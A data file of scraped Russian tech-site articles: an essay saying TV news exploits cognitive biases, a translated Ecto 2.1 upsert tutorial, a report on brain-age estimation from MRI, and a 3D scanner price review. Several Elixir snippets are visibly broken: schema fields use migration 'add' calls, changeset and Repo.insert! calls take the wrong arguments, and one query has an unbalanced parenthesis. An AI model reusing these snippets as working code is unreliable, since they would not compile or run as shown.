2. Люди склонны замечать и запоминать скорее особенные, причудливые и смешные образы, чем непричудливые или несмешные.
3. Люди склонны замечать изменения.
4. Людей притягивает информация, которая подтверждает их убеждения.
5. Люди склонны лучше замечать ошибки у других, чем у себя.
Почитайте внимательно этот список и подумайте, кто именно может эксплуатировать данные когнитивные искажения (то есть своеобразные «уязвимости» защитной системы мозга) в своих целях. Каким способом проще всего создать иллюзию правды и иллюзию частоты ? Очевидно, что эти эффекты проще всего создать, если систематически и ежедневно доводить до человека одни и те же послания. Другими словами, нужен стабильный контролируемый канал трансляции посланий на массовую аудиторию.
Это телевидение.
Новости по ТВ внушают иллюзию, что зритель должен быть постоянно «в курсе событий», что всё происходящее исключительно важно. Включения в прямом эфире, 24-часовые трансляции во время «важных» событий вроде выборов. Предполагается, что люди смотрят телевизор круглосуточно, следят за каждым новым фрагментом информации.
Если происходит авиакатастрофа или другая авария, то зрителя держат в напряжении несколько суток, скармливая по кусочку всё новые и новые фрагменты информации, прерывая программу экстренными выпусками, запуская бегущую строку с горячими новостями. Когда интерес к той теме стихает — происходит ещё что-нибудь «исключительно важное», и напряжённая возбуждённость сохраняется. Эта напряжённая возбуждённость сохраняется постоянно .
«Горячие новости» привлекают всеобщее внимание, а аналитические отчёты со всесторонней объективной информацией интересны лишь редким специалистам. Не только телевидение
В силу вышеупомянутых особенностей восприятия некоторая информация привлекает особенное внимание аудитории. Это «горячие новости», составленные с учётом особенностей человеческого мышления. Их необязательно транслировать по телевидению. Можно использовать и другие каналы. Интернет даже более благоприятная среда для распространения так называемых «мемов», источником которых часто являются те же горячие новости.
Горячие новости и мемы для максимальной эффективности должны эксплуатировать те же когнитивные искажения, то есть «уязвимости» человеческого мозга, которые хорошо известны: систематическая ошибка внимания ;
эффект иллюзии правды ;
эффект знакомства с объектом ;
забывание без контекста ;
иллюзия частоты ;
эффект превосходства картинки ;
эффект самореференции ;
уклон к негативу ;
склонность к подтверждению своей точки зрения ;
искажение в восприятии сделанного выбора ;
консерватизм ;
эффект страуса .
В упрощённом виде, для максимального эффекта зомбирования «горячие новости» должны соответствовать нескольким требованиям. Это должна быть: знакомая тема, соответствующая убеждениям человека, повторяющаяся, подтверждающая сделанный выбор, негативного характера, желательно с картинкой
В интернете тоже можно распространять такую информацию. При длительном использовании «зомбирование» становятся более эффективными благодаря эффекту иллюзии правды и многократному повторению лжи. Как изменится жизнь, если перестать смотреть новости
В первую очередь, хочется сказать «никак», ведь новости по ТВ не дают объективной картины мира, не дают важной и ценной информации, необходимой для принятия жизненных решений. Но в реальности если перестать смотреть новости по ТВ, жизнь человека действительно сильно изменится, причём в лучшую сторону . У вас появится больше свободного времени
Вспомните, какие полезные дела вы сделали или закончили во время просмотра новостей. Скорее всего, ответ: «Никаких». Во время просмотра новостей люди могут только пассивно потреблять пищу или заниматься простой ручной работой. Творческие энергозатратные процессы мало совместимы с просмотром новостей, они слишком отвлекают из-за намеренной эксплуатации когнитивных искажений («уязвимостей») мозга. Собственно, новости специально конструируются таким образом, чтобы наиболее эффективно привлечь внимание человека и скормить ему определённую информацию. В эпоху постправды это может быть заведомо ложная информация, поскольку воздействие идёт на эмоциональным уровне с программированием последующего эффекта, который не изменится после опровержения тезиса (постправда).
Каждую информацию можно воспринимать с условием: насколько это важно для вас будет через неделю, через год, через 10 лет? В этом смысле «горячие новости» чаще всего абсолютно бесполезны — это пустая трата времени. Эффективным приёмом может быть чтение новостей с задержкой на сутки или больше. По прошествии этого периода становится более понятным, что является важным, а что — сиюминутным.
Отказавшись от просмотра и чтения всех подряд «горячих» новостей, вы освободите много времени для более важных задач в своей жизни.
Кто-то говорит, что смотрит новости, чтобы быть «в курсе событий», потому что «нельзя игнорировать текущие проблемы». На самом деле такой человек и сам наверняка понимает, что это неправда. Это очень легко проверить: если человек на неделю или месяц откажется от ежедневного просмотра новостей, то он совершенно точно не пропустит ничего из важных текущих событий.
Посчитайте, сколько времени человек тратит на это абсолютно бесполезное занятие. Ежедневные часы складываются в месяцы. Это время можно потратить на что-нибудь действительно полезное. Например, если бы человек вместо ежевечернего просмотра новостей учил иностранный язык, то он абсолютно ничего не пропустил бы из «актуальных событий», зато через несколько лет знал бы несколько новых иностранных языков на очень хорошем уровне.
Почти все ток-шоу и обсуждения текущих событий на телевидении — абсолютно бесполезная болтовня с близким к нулю информационным содержанием. Люди очень любят выражать своё мнение по всем вопросам, в которых хоть немного разбираются (ключевое слово «немного»). Нужно ли уделять время и слушать часовые дебаты таких людей?
В конце концов, есть более эффективные способы получения информации. Телевидение точно не относится к таким. Например, если прочитать пару книг на любую конкретную тему, то вы будете разбираться в этой теме лучше, чем 99% населения планеты. Даже если потратить годы на просмотр телевидения, вы ни в чём и никогда не достигнете такого уровня знаний. Все знания будут поверхностными, размытыми и во многом ложными. Фактически, вспоминая о желании телезрителей «оставаться в курсе событий» и «быть информированными», здесь практически нет разницы между «быть информированным» и «быть дезинформированным».
Ещё один интересный феномен постоянного просмотра новостей по ТВ — иллюзия участия . Телезритель неравнодушен, он переживает, сочувствует жертвам, испытывает искреннее возмущение несправедливостью. Ему кажется, что нельзя игнорировать такие вещи, надо обязательно быть в курсе, следить за событиями. Он как будто участвует в них, но это не так. На самом деле он совершенно непричастен к происходящему. Его переживания облегчают собственное чувство вины, но никому не приносят пользу.
Вполне возможно, что здесь действует некий эффект замены. И если бы человек не сопереживал абстрактным жертвам по ТВ, то проявил бы больше сочувствия к реальным окружающим его людям.
Главнейшая причина, по которой люди смотрят новости по ТВ — это забота о ближних, тревога, беспокойство о том, что происходит вокруг — на деле превращается в свою противоположность. Большинство зрителей ТВ в реальности не оказывают никакой помощи тем жертвам, которых они видят по ТВ. Это некая «сублимация сочувствия», от которой, вероятно, только страдают окружающие.
Получается, что главная причина, по которой люди смотрят новости — это одновременно и главная причина, по которой следует отказаться от их просмотра. Вы будете лучше себя чувствовать Распространённый симптом отказа от просмотра новостей — общее улучшение настроения. Сложно сказать, что является причиной такого эффекта. Судя по всему, зомбирование новостями и постоянная эксплуатация когнитивных искажений («уязвимостей») мозга не очень хорошо сказывается на самочувствии человека. Освободив голову от мусора, человек начинает мыслить яснее, а общее самочувствие улучшается.
В самом деле, ведь правило эффективного зомбирования предполагает выбор наиболее ярких, экстраординарных сюжетов с негативным уклоном. Они лучше всего привлекают внимание и воздействуют на человека. Грубо говоря, это торговля страхом. Задача состоит в том, чтобы испугать человека. Поток ужасных, страшных событий, связанных с насилием и эксплуатацией различных страхов — страхом перед будущим (страх изменений), перед технологиями, перед корпорациями, перед иностранцами, перед эмигрантами, перед людьми другой сексуальной ориентации или каким-либо отличающимися людьми (архетип «чужака», который хочет захватить некие ваши ресурсы, активно эксплуатируется в новостях).
Если освободиться от этого потока страха — вполне естественно, что вы почувствуете себя лучше.
Зная о когнитивных искажениях, мы знаем правила, по которым подбираются сюжеты новостей. Теперь мы может примерно понять, почему тот или иной сюжет привлекает внимание (какой страх эксплуатируется, какое скрытое послание зашифровано в теме). Это очень полезное знание. Только следует помнить, что даже знание когнитивных искажений и признание их наличия у себя не даёт возможность нивелировать их эффект. Проведённые научные исследования не выявили свидетельств , что осведомлённость о собственных когнитивных искажениях как-то помогает людям избежать их.
Другими словами, зомбирование по ТВ будет эффективным в любом случае, даже если вы знакомы с приёмами, которые применяют авторы сюжетов. Выход только один — не смотреть вообще. «Теперь нельзя верить ничему, что видишь в газетах. Сама правда становится подозрительной, когда она преподносится на этих запачканных страницах… Я смотрю с печальным сочувствием на многих моих сограждан, которые, читая газеты, живут и умирают в убеждении, что в какой-то мере знают, что происходит в этом мире… Основные факты из газет всё-таки можно получить, но на детали нельзя положиться. Добавлю, что человек, который никогда не заглядывает в газеты, обладает лучшими знаниями, чем тот, кто газеты читает, поскольку не знающий ничего всё же ближе к истине, чем тот, чей ум наполнен ложными и ошибочными сведениями. Тот, кто не читает газет, всё ещё знает основные факты, а все подробности в газетах являются ложью». Из письма Томаса Джефферсона Джону Норвеллу, 11 июня 1807 года | https://geektimes.ru/post/283700/ |
habrahabr | Связь многие ко многим и upsert в Ecto 2.1 | ['elixir', 'ecto', 'phoenix', 'upsert'] |
В предыдущей главе мы говорили о many_to_many ассоциациях и как маппить внешние данные в ассоциированные сущности с помощью Ecto.Changeset.cast_assoc/3. Тогда мы были вынуждены следовать... | В предыдущей главе мы говорили о many_to_many ассоциациях и как маппить внешние данные в ассоциированные сущности с помощью Ecto.Changeset.cast_assoc/3 . Тогда мы были вынуждены следовать правилам, накладываемыми функцией cast_assoc/3 , но делать это не всегда возможно или желательно. В этой главе мы рассмотрим Ecto.Changeset.put_assoc/4 в сравнении с cast_assoc/3 и разберем несколько примеров. Также мы взглянем на функцию upsert, которые появятся в Ecto 2.1. put_assoc vs cast_assoc Представьте, что мы делаем приложение-блог, у которого есть посты и каждый пост может иметь много тэгов. И также, каждый тэг может относиться к нескольким постам. Это классический сценарий, где можно использовать many_to_many связь. Наша миграция будет выглядеть так: create table(:posts) do
add :title
add :body
timestamps()
end
create table(:tags) do
add :name
timestamps()
end
create unique_index(:tags, [:name])
create table(:posts_tags, primary_key: false) do
add :post_id, references(:posts)
add :tag_id, references(:tags)
end Заметьте, что мы добавили уникальный индекс к имени тэга, потому что нам не нужны тэги с одинаковыми именами в нашей базе данных. Важно добавить индекс именно на уровне базы данных, вместо использования валидаций, так как всегда есть шанс, что два тэга с одинаковыми именами будут провалидированы и вставлены одновременно, что приведет к дублированию записей. Теперь, представим также, что пользователь вводит тэги, как список слов, разделенный запятой, как например: “elixir, erlang, ecto”. Когда эти данные будут получены на сервере, мы разделим их на отдельные теги, свяжем с нужным постом, и создадим те тэги, которых еще нет в базе данных. Пока что, условия выше, звучат разумно, но они совершенно точно вызовут проблемы при использовании cast_assoc/3 . Мы помним, что cast_assoc/3 это changeset функция, созданная для получения внешних параметров, и сравнения их с ассоциированными данными в нашей модели. Ecto требует тэгов для отправки в виде списка мапов (прим.пер. list of maps). Однако, в нашем случае, мы ожидаем тэги в виде строки, разделяемой запятой. Более того, cast_assoc/3 опирается на значение первичного ключа для каждого тэга, для того чтобы решить, надо его вставить, обновить, или удалить. Опять, так как у нас пользователь просто присылает строку, мы не имеем информации о первичном ключе. Когда мы не можем бороться с cast_assoc/3 , настает время для использования put_assoc/4 . В put_assoc/4 , мы получаем Ecto структуру или changeset, вместо параметров, что позволяет нам манипулировать данными так, как мы хотим. Давайте определим схему и changeset функцию для поста, который может принимать теги в виде строки: defmodule MyApp.Post do
use Ecto.Schema
schema "posts" do
add :title
add :body
many_to_many :tags, MyApp.Tag, join_through: "posts_tags"
timestamps()
end
def changeset(struct, params \\ %{}) do
struct
|> Ecto.Changeset.cast(struct, [:title, :body])
|> Ecto.Changeset.put_assoc(:tags, parse_tags(params))
end
defp parse_tags(params) do
(params["tags"] || "")
|> String.split(",")
|> Enum.map(&String.trim/1)
|> Enum.reject(& &1 == "")
|> Enum.map(&get_or_insert_tag/1)
end
defp get_or_insert_tag(name) do
Repo.get_by(MyApp.Tag, name: name) ||
Repo.insert!(MyApp.Tag, %Tag{name: name})
end
end В changeset функции выше, мы вынесли всю обработку тэгов в отдельную функцию, названную parse_tags/1 , которая проверяет существование параметра, разделяет его на значения с помощью String.split/2 , затем удаляет лишние пробелы с помощью String.trim/1 , удаляет все пустые строки и в конце проверяет, существует ли тэг в базе данных, и если нет, то создает его. Функция parse_tags/1 Возвращает список MyApp.Tag структур, который мы прокидываем в put_assoc/3 . Вызывая put_assoc/3 , мы говорим Ecto, что с этого момента вот эти тэги будут связаны с постом. Если тэги, которые были ассоциированы раньше, не будут получены в put_assoc/3 , то Ecto побеспокоится о том, чтобы удалить ассоциацию между постом и удаленным тэгом в базе данных. И это все что необходимо для использования связи many_to_many с put_assoc/3 . Функция put_assoc/3 работает с has_many , belongs_to и со всеми остальными типами ассоциаций. Однако, наш код не готов к продакшену, давайте посмотрим, почему. Ограничения и состояние гонки Вспомним, что мы добавили уникальный индекс к колонке :name тэга. Мы сделали это чтобы защитить себя от дубликатов тэгов в базе данных. Добавляя уникальный индекс и затем, используя get_by с insert! , чтобы получить или вставить тэг, мы создаем потенциальную ошибку в нашем приложении. Если два поста отправятся одновременно с одинаковыми тэгами, то есть шанс что проверка на наличие тэга произойдет в одно время, и оба процесса решат, что такого тэга не существует в базе данных. Когда это случится, только один процесс успешно выполнится, тогда как второй обязательно провалится с ошибкой. Это состояние гонки (прим. пер. — race condition): ваш код будет падать с ошибкой время от времени, когда определенные условия встретятся. И эти условия будут встречаться в зависимости от времени. Многие разработчики считают что такие ошибки никогда не случаются на практике, или если случаются, то они незначительны. Но на практике, возникновение этих ошибок сильно ухудшает впечатления пользователя. Я слышал пример “из первых рук”, от компании, которая занимается разработкой мобильных игр. В их игре, игроки могут проходить квесты, и каждый квест ты выбираешь второго игрока (гостя) из некоего списка, для прохождения квеста вместе с тобой. В конце квеста ты можешь добавить второго игрока в друзья. Изначально список гостей был рандомным, но через некоторое время, пользователи стали жаловаться, что иногда старые аккаунты, часто неактивные, появляются в списке гостей. Чтобы исправить эту ситуацию, разработчики начали сортировать игровой список по наиболее активным за последнее время игрокам. Это означало, что если ты играл недавно, то есть высокие шанс появится у кого нибудь в гостевом списке. Однако, когда они внесли эти изменения, у пользователей начало появляться множество ошибок, и они, разъяренные, пришли на игровые форумы. Это произошло потому что, когда они сортировали список по активности, как только два игрока входят в систему, их персонажи скорее всего, появятся в каждом списке других гостей. Если эти игроки выбирают друг друга, то только первый игрок, который успеет добавить второго в друзья, сможет сделать это, второй же не сможет, потому что отношение с этим пользователем уже будет существовать! Не только в этом проблема, еще и дело в том, что весь прогресс, полученный за квест, будет потерян, потому что сервер не сможет должным образом сохранить результаты в базу данных. Понятно, почему пользователи начали жаловаться. Long story short: мы должны разобраться с состоянием гонки. К счастью Ecto предоставляет нам механизм обработки constraint errors базы данных. Проверка на constraint errors Когда наша функция get_or_insert_tag(name) упадет из за того что тэг уже существует в базе данных, нам нужно обработать этот сценарий. Давайте перепишем эту функцию, держа в уме состояние гонки. defp get_or_insert_tag(name) do
%Tag{}
|> Ecto.Changeset.change(name: name)
|> Ecto.Changeset.unique_constraint(:name)
|> Repo.insert
|> case do
{:ok, tag} -> tag
{:error, _} -> Repo.get_by!(MyApp.Tag, name: name)
end
end Вместо того чтобы напрямую записать тэг, мы сначала собираем changeset, который позволяет нам использовать unique_constraint аннотацию. Теперь Repo.insert не упадет из за ошибки связанной с уникальным индексом на :name , но вернет {:error, changeset} кортеж. Следовательно, если Repo.insert проходит успешно, это означает что тэг сохранен, в противном случае, если тэг существует, тогда мы просто получим его с помощью Repo.get_by! . Хотя механизм, описанный выше, чинит состояние гонки, он довольно дорогой. Нам необходимо обработать два запроса для каждого тэга, который уже существует в базе данных: (неуспешный) insert и затем получение тэга из репозитория. Учитывая что это довольно распространенный сценарий, мы можем переписать это все следующим образом: defp get_or_insert_tag(name) do
Repo.get_by(MyApp.Tag, name: name) || maybe_insert_tag(name)
end
defp maybe_insert_tag(name) do
%Tag{}
|> Ecto.Changeset.change(name: name)
|> Ecto.Changeset.unique_constraint(:name)
|> Repo.insert
|> case do
{:ok, tag} -> tag
{:error, _} -> Repo.get_by!(MyApp.Tag, name: name)
end
end Код выше создает один запрос для каждого существующего тэга, два запроса для каждого нового тэга, и 3 запроса в состоянии гонки. Все это в среднем будет работать немного лучше, но Ecto 2.1 позволяет сделать лучше. Upserts Ecto 2.1 поддерживает, так называемую, команду “upsert”, которая является аббревиатурой к “update or insert”. Идея в том, что когда мы попробуем записать в базу данных и получим ошибку, например из-за уникального индекса, мы можем решить, будет ли база данных выбрасывать ошибку (по умолчанию), игнорировать ошибку (no error) или обновлять конфликтующую сущность. Функция “upsert” в Ecto 2.1 работает с параметром :on_conflict . Давайте перепишем get_or_insert_tag(name) еще раз, используя :on_conflict параметр. Помните, что “upsert” это новая фича PostgreSQL 9.5, так что убедитесь, что у вас стоит эта версия базы. Попробуем использовать :on_conflict с параметром :nothing как ниже: defp get_or_insert_tag(name) do
Repo.insert!(%MyApp.Tag{name: name}, on_conflict: :nothing)
end Хотя функция выше и не будет вызывать ошибку, в случае конфликта, также она не будет обновлять полученную структуру, и будет возвращать тэг без ID. Одно из решений это заставить обновление произойти даже в случае конфликта, даже если обновление касается изменения имени тэга. В этом случае PostgreSQL также требует :conflict_target параметр, который указывает на столбец (или список столбцов), в которых мы ожидаем ошибку: defp get_or_insert_tag(name) do
Repo.insert!(%MyApp.Tag{name: name},
on_conflict: [set: [name: name]], conflict_target: :name)
end И все! Мы пробуем записать тэг в базу, и если он уже существует, то говорим Ecto обновить имя до текущего значения, обновляем тэг и получаем его id. Это решение, безусловно, на шаг впереди всех остальных, оно делает один запрос на каждый тэг. Если 10 тэгов получено, будет совершенно 10 запросов. Как мы можем еще улучшить это? Upserts и insert_all Ecto 2.1 добавляет :on_conflict параметр не только к Repo.insert/2 , но также и к Repo.insert_all/3 функции, представленной в Ecto 2.0. Это означает, что мы можем одним запросом записать все недостающие тэги, и еще одним получить их все. Давайте посмотрим как будет выглядеть схема Post после этих изменений: defmodule MyApp.Post do
use Ecto.Schema
# Schema is the same
schema "posts" do
add :title
add :body
many_to_many :tags, MyApp.Tag, join_through: "posts_tags"
timestamps()
end
# Changeset is the same
def changeset(struct, params \\ %{}) do
struct
|> Ecto.Changeset.cast(struct, [:title, :body])
|> Ecto.Changeset.put_assoc(:tags, parse_tags(params))
end
# Parse tags has slightly changed
defp parse_tags(params) do
(params["tags"] || "")
|> String.split(",")
|> Enum.map(&String.trim/1)
|> Enum.reject(& &1 == "")
|> insert_and_get_all()
end
defp insert_and_get_all([]) do
[]
end
defp insert_and_get_all(names) do
maps = Enum.map(names, &%{name: &1})
Repo.insert_all MyApp.Tag, maps, on_conflict: :nothing
Repo.all from t in MyApp.Tag, where: t.name in ^names)
end
end Вместо того чтобы пытаться записать и получить каждый тэг индивидуально, код выше работает со всеми тэгами сразу, сначала создавая список мапов(прим. пер. list of maps) который передается в insert_all и затем получает все тэги с необходимыми именами. Теперь, несмотря на то, сколько тэгов мы получим, мы всегда делаем только два запроса (кроме того варианта, когда тэгов не получено, тогда мы сразу вернем пустой список). Это решение возможно, благодаря внедрению в Ecto 2.1 параметра :on_conflict , который гарантирует, что insert_all не упадет с ошибкой, если полученный тэг уже существует. Напоследок, не забывайте, что мы не использовали транзакции ни в одном примере выше. Это решение было преднамеренным. Получение или запись тэгов является идемпотентной операцией, то есть мы можем повторить ее сколько угодно раз, и всегда получим одинаковый результат. Поэтому, если мы не можем записать пост в базу данных из за ошибки валидации, пользователь будет пытаться отправить форму еще раз, и каждый раз мы будем совершать операцию получения или записи тэгов. В случае, если это не требуется, все операции могут быть обернуты в транзакцию, или смоделированы с помощью Ecto.multi абстракции, о которой мы поговорим в следующих главах. » Оригинал
» Автор: Jose Valim | https://habrahabr.ru/post/317602/ |
habrahabr | Нейросеть научилась определять возраст мозга по МРТ | ['сверточные сети', 'глубинное обучение', 'мрт', 'возраст мозга'] |
С возрастом когнитивные способности человека снижаются. Нейробиологам давно известно, что это снижение коррелирует с физическими изменениями в головном мозге. Увидеть первые признаки старения... |
С возрастом когнитивные способности человека снижаются. Нейробиологам давно известно, что это снижение коррелирует с физическими изменениями в головном мозге. Увидеть первые признаки старения или даже определить возраст мозга можно с помощью МРТ, а разница между возрастом мозга и хронологическим возрастом человека помогает выявить нейродегенеративные заболевания на начальных стадиях.
Такой анализ зачастую является очень долгим, поскольку данные МРТ нужно детально обработать, прежде чем запустить автоматизированные процессы распознавания старения: удалить с изображения кости черепа, разделить серое и белое вещество и другие ткани, а также удалить артефакты изображения, включая различные способы сглаживания изображения. Вся обработка может занять более 24 часов, и это препятствие для врачей, надеющихся принимать во внимание возраст головного мозга пациента в процессе клинической диагностики. Ученые из Королевского колледжа в Лондоне нашли способ ускорить этот процесс.
Джованни Монтана и его команда натренировали сверточную нейронную сеть ( CNN ) для измерения возраста мозга с использованием исходных данных из сканера МРТ. Методика глубинного обучения занимает всего несколько секунд и может дать врачам точное представление о возрасте мозга, пока пациент находится в сканере.
Метод является стандартной техникой глубинного обучения. Монтана и его команда использовали томограммы мозга более 2000 здоровых людей в возрасте от 18 до 90 лет. Ни у кого из них не было выявлено неврологических заболеваний, которые могли бы повлиять на их мозг. Поэтому возраст мозга должен соответствовать возрасту участников эксперимента в паспорте.
Каждый скан представляет собой Т-1 взвешенное изображение. На таком изображении жидкости в головном мозге проявляются более темным цветом, белое вещество светлым, серое вещество – серым, жир – ярким цветом. Такое сканирование обычно проводят для исследований грудной клетки, опорно-двигательного аппарата, брюшной полости и головного мозга. Пример нейровизуализации входных данных для использования в моделях прогнозирования возраста. А — серое вещество в осевой проекции, В — белое вещество в осевой проекции, С — «сырые» или минимально обработанные Т1-взвешенные изображения.
На каждом снимке ученые отметили хронологический возраст пациента. Команда использовала 80% изображения для обучения сверточной нейронной сети, чтобы определить возраст человека, учитывая скан их мозга. Еще 200 изображений ушло на проверку работоспособности сети. Наконец, они испытали нейронную сеть на 200 изображениях, которые она еще не видела, чтобы определить, насколько хорошо она справляется с определением возраста мозга.
В то же время, команда сравнила результаты глубинного подхода с традиционным способом определения возраста мозга. Он требует значительной обработки изображения для идентификации, в том числе белого и серого вещества в мозге с последующим статистическим анализом – регрессии на основе гауссовских процессов .
Результаты оказались довольно интересными. И глубинное обучение, и статистический анализ точно определяют хронологический возраст пациентов при введении данных для анализа в препроцессированной форме . Оба метода так или иначе работают с погрешностью менее 5 лет при определении точного возраста головного мозга. Точность CNN и регрессии на основе гауссовских процессов при анализе 200 изображений. Хронологический возраст (ось Х), предполагаемый возраст мозга (ось Y). А — результаты CNN, B — результаты регрессии на основе гауссовских процессов, С — результаты CNN при анализе необработанных Т1-взвешенных изображений. r — коэффициент корреляции возраста мозга и хронологического возраста со всех графиков.
Тем не менее, глубинное изучение демонстрирует свое явное превосходство при анализе исходных данных МРТ, где сеть определяет правильный возраст со средней погрешностью 4,66 лет. В отличие от CNN, стандартный метод регрессии на основе гауссовских процессов хуже справился с задачей: средняя погрешность составила почти 12 лет.
Более того, глубинное обучение занимает всего несколько секунд по сравнению с 24 часами предварительной обработки, необходимой для стандартного метода. Единственная обработка данных, необходимая для сверточной нейронной сети, должна определить последовательность ориентации изображения и размеры воксела между ними. Для врачей это важно: после внедрения соответствующего программного обеспечения, данные о возрасте мозга пациента можно получить, когда тот еще находится в сканере.
Команда также сравнила изображения, полученные с использованием различных сканеров, чтобы показать, что метод можно применить для сканов, собранных с разных машин в разных частях мира. Помимо этого они сравнили возраст мозга 62 женщин-близнецов, чтобы показать, как возраст мозга связан с генетическими факторами. В ходе этого исследования ученые выявили высокую наследуемость уровня старения мозга, которая с возрастом неминуемо снижается. Считается, что экологические факторы становятся более значимыми с течением времени, и здесь ученые наметили перспективное направление будущих исследований.
Результат работы Монтаны и его команды обладает потенциалом повлиять на то, как врачи определяют верный диагноз. Есть немало свидетельств, что такие заболевания, как диабет, шизофрения и травматические повреждения головного мозга коррелируют с более быстрым его старением. Таким образом, быстрое и точное измерение старения мозга может значительно повлиять на то, как врачи в будущем будут справляться с этими заболеваниями.
Научная работа опубликована на arXiv.org ( Arxiv: 1612,02572 [stat.ML]) | https://geektimes.ru/post/283684/ |
habrahabr | Профессиональные 3D-сканеры до 1,5 млн рублей | ['3d-печать', '3d-моделирование', '3d-сканеры', 'профессиональное оборудование', 'прототипирование'] |
3D-cканеры стоимость от 500 000 до 1500 000 рублей предоставляют больше возможностей пользователям, а именно — большую скорость работы и разрешение, чем сканеры предыдущей ценовой категории.... |
3D-cканеры стоимость от 500 000 до 1500 000 рублей предоставляют больше возможностей пользователям, а именно — большую скорость работы и разрешение, чем сканеры предыдущей ценовой категории . Однако, друг от друга они тоже отличаются. В этом обзоре мы рассмотрим, в чем же именно состоят эти отличия. 3D сканер RangeVision Standard Plus
Применяется в проектировании промышленных изделий, реверсивной разработке, в образовательных целях.
Данный сканер, как и остальные сканеры RangeVision этого модельного ряда, поставляется в различных опциональных модификациях, от которых зависит объем области сканирования. Это обязательно надо учесть в случае покупки и проконсультироваться со специалистом. Зона сканирования см: 92 х 69 х 69
Точность, мкм: 160
Цвет: нет
Цена: от 635 000 руб. (в зависимости от опций)
1,3 мп камера (1280х1024)
CMOS матрица / диагональ 1/1.8"
Время сканирования 7 секунд
Металлический корпус камер
3D разрешение 0.05 мм — 0.35 мм (в зависимости от зоны сканирования)
3D сканер RangeVision Advanced
Применяется в проектировании промышленных и ювелирных изделий, реверсивной разработке, в образовательных целях, для создания копий предметов на заказ.
Повышенное разрешение при сканировании. Калибровочные поля, светофильтры и поворотный стол в комплекте отличают эту модель. Зона сканирования см: 92 х 69 х 69
Точность, мкм: 160
Цвет: нет
Цена: от 710 000 руб.
2 Мп камеры (1600x1200)
CCD матрица / диагональ 1/1.8"
Сканирование черного
Время сканирования 12 секунд
Металлический корпус камер
3D разрешение 0.043 мм — 0.3 мм (в зависимости от опций)
3D сканер RangeVision Premium
Применяется в проектировании промышленных и ювелирных изделий — украшений, корпусов электронных устройств, в реверсивной разработке, в образовательных целях.
Ещё большее разрешение, благодаря камере в 5 мегапикселей. Сканирование объектов с диапазоном размеров от ювелирных украшений, до автомобиля. Зона сканирования см: 92 х 69 х 69
Точность, мкм: 30
Цвет: нет
Цена: от 1 180 000 руб.
5 Мп камера (2448x2050)
CCD матрица / диагональ 2/3"
Сканирование черного
Время сканирования 15 секунды
Металлический корпус камер
3D разрешение 0.05 мм — 0.18 мм (в зависимости от зоны сканирования)
3D сканер Artec Eva Lite
Применяется в научной, образовательной и инженерной деятельности — создание 3D-моделей объектов искусства и музейных ценностей, проектирование промышленных и ювелирных изделий.
Легкий и удобный в использовании сканер, простой и надежный в эксплуатации, не требующий специальной подготовки или специфических навыков. Один из самых “дружелюбных” 3D-сканеров для начинающих. От более недорогих моделей конкурентов отличается высоким качеством сканирования. Зона сканирования см: 200 x 200 x 200
Точность, мкм: 100
Цвет: нет
Цена: 6225 EUR.
Комплектация: 3D сканер Artec Eva Lite;
Руководство пользователя;
Программное обеспечение.
Сканирует объекты с размерами до 200х200х200 см., при этом, расстояние до объекта сканирования — от 0,4 до 1 метра, а скорость сканирования составляет 2 млн точек в секунду. 3D сканер Artec Eva
Применяется в инженерной и музейной деятельности, а также в археологии и палеонтологии — достаточно легкий и удобный в обращении сканер, не требующий специальных знаний и предварительных процедур.
Работает без применения маркеров и предварительной калибровки, автоматически производит захват текстур и цветов объекта и склеивает снимки в объемный объект. От модели Lite отличается способностью захватывать текстуры и работать с цветом, разрешение и скорость работы такие же. Зона сканирования см: 200 x 200 x 200
Точность, мкм: 100
Цвет: да
Цена: 12 765 EUR.
3D сканер Artec Space Spider
Применяется в научно-технической и инженерной деятельности, оптимизирован для наиболее точного и подробного сканирования небольших объектов.
По сравнению с предыдущей моделью (Artec Spider) сокращено время прогрева камер и улучшена система контроля точности, которая теперь составляет пятьдесят микрон, что в два раза выше чем у Artec Spider. Продуманная конструкция предоставляет пользователю простой и интуитивно понятный процесс сканирования. Этот сканер находит применение везде — от ювелирного дела, до промышленности и инженерии. Зона сканирования см: 17 — 35
Точность, мкм: 50
Цвет: да
Цена: 1 414 511 руб.
https://youtu.be/QFzk3zCQXRc 3D сканер AICON Scanreference Зона сканирования: не ограничена
Цвет: нет
Цена: 693 653 руб.
Фотограмметрическое устройство Scanreference применяется в таких областях, как строительство и архитектура, разработка и ремонт автомобилей, создание трехмерных моделей для виртуальной реальности и многое другое. В первую очередь предназначено для 3D-сканирования крупных объектов.
Это устройство способно работать как само по себе, так и в комплекте с другим 3D-сканером. Программа строит трехмерную модель на основе полученных изображений и нанесенных на объект съемки меток. Тщательно откалиброванное оборудование и оснащение комплектами маркеров и эталонными панелями дает при использовании непревзойденную точность распознавания форм объектов.
При использовании стороннего сканера (например — Artec Space Spider) вместе с оборудованием и программным обеспечением Scanference точность и скорость сканирования возрастают многократно, плюс — появляется возможность работы с цветом. 3D сканер Texel Portal Зона сканирования см: 120 x 120 x 220
Цвет: да
Цена: от 1560 000 р
Скорость сканирования: 30 сек
Программно-аппаратный комплекс Texel Portal предназначен для сканирования людей и быстрого получения трехмерных моделей для дальнейшего использования, например — немедленной распечатки трехмерного портрета в полный рост.
Разумеется, возможно сканирование не только человека, но и любого устойчивого объекта подходящих размеров и массы.
3D-сканер Texel Portal использует сенсоры PrimeSense, такие же как в системе Kinect, благодаря чему не имеет проблем со сканированием сложных форм одежды и причесок, а также темных и блестящих материалов. Время сканирования составляет всего 30 секунд, а разрешение поверхности 3D-модели — 1 мм. После завершения сканирования система несколько минут автоматически обрабатывает получившуюся 3D-модель, после чего её можно сразу распечатывать или передать для дальнейшего использования.
Сканер опционально может комплектоваться удобной кабинкой для съемки. 3D сканер Tardis Зона сканирования см: 100 х 100 х 220
Цвет: да
Цена: от 1100 000 р
Скорость сканирования: 1 сек
Tardis предназначен для создания моментальных объемных ростовых портретов людей и их незамедлительной обработки. Скорость и качество сканирования позволяют моментально создавать статуэтки заказчиков, не заставляя их долго ждать.
3D-сканер Tardis — детище команды Tardis, резидента Сколково. Этот аппарат способен сделать объемный снимок человека в полный рост всего за одну секунду, а через считанные минуты можно получить детальную 3D-модель и использовать её для печати. Максимальное время обработки модели составляет всего 10 минут.
Предоставляемое со сканером облачное хранилище вмещает неограниченное количество сканов, а включенные в программу услуги дизайнеров помогут решить любую поставленную задачу по обработке и модификации объекта.
Рабочий цикл разделен на три этапа: сканирование объекта, запись модели в облачное хранилище, корректировка дизайнером.
